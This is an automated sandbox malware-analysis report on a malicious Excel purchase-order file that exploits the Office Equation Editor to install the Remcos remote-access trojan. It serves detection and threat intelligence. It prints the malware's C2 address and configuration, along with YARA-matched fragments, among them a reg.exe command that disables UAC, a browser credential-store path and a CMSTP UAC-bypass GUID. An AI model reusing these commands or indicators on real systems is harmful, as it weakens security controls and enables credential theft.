Edit tour

Windows Analysis Report
PO-00006799868.xls

Overview

General Information

Sample name:	PO-00006799868.xls
Analysis ID:	1532154
MD5:	e78662c0ecb1a705f3f16366cff45409
SHA1:	0de40063c9028a33b77d4cb3de06dec0f705059b
SHA256:	33c790e2db3f22fbd80c43a82837b5fb7a0f4a317b25dbab1e984baf95fa82bc
Tags:	xlsuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Remcos

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Excel sheet contains many unusual embedded objects

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Microsoft Office drops suspicious files

Office drops RTF file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Searches for Windows Mail specific files

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3564 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3164 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

taskhostw.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

name.exe (PID: 3328 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

svchost.exe (PID: 3316 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 1908 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk" MD5: 54A47F6B5E09A77E61649109C6A08866)

wscript.exe (PID: 1404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: 045451FA238A75305CC26AC982472367)

name.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

svchost.exe (PID: 2176 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x2030:$obj2: \objdata 0x2048:$obj3: \objupdate 0x200c:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x2030:$obj2: \objdata 0x2048:$obj3: \objupdate 0x200c:$obj4: \objemb

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
Process Memory Space: name.exe PID: 3328	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: name.exe PID: 3328	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: name.exe PID: 3328	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: name.exe PID: 3328	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf859e:$a1: Remcos restarted by watchdog! 0xf8af8:$a3: %02i:%02i:%02i:%03i 0xf8f27:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3316	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: svchost.exe PID: 3316	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 3316	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 3316	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 3316	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x247ae:$a1: Remcos restarted by watchdog! 0x24d08:$a3: %02i:%02i:%02i:%03i 0x25137:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 2148	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: name.exe PID: 3000	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: name.exe PID: 3000	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: name.exe PID: 3000	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: name.exe PID: 3000	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x110c39:$a1: Remcos restarted by watchdog! 0x111193:$a3: %02i:%02i:%02i:%03i 0x1115c2:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 2176	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 2176	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 2176	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 2176	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8739:$a1: Remcos restarted by watchdog! 0x8c93:$a3: %02i:%02i:%02i:%03i 0x90c2:$a3: %02i:%02i:%02i:%03i
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.svchost.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
18.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
18.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
18.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
18.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
18.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
18.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
18.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
11.2.name.exe.10a0000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.name.exe.10a0000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.name.exe.10a0000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.name.exe.10a0000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
11.2.name.exe.10a0000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
11.2.name.exe.10a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
12.2.svchost.exe.400000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.svchost.exe.400000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.svchost.exe.400000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
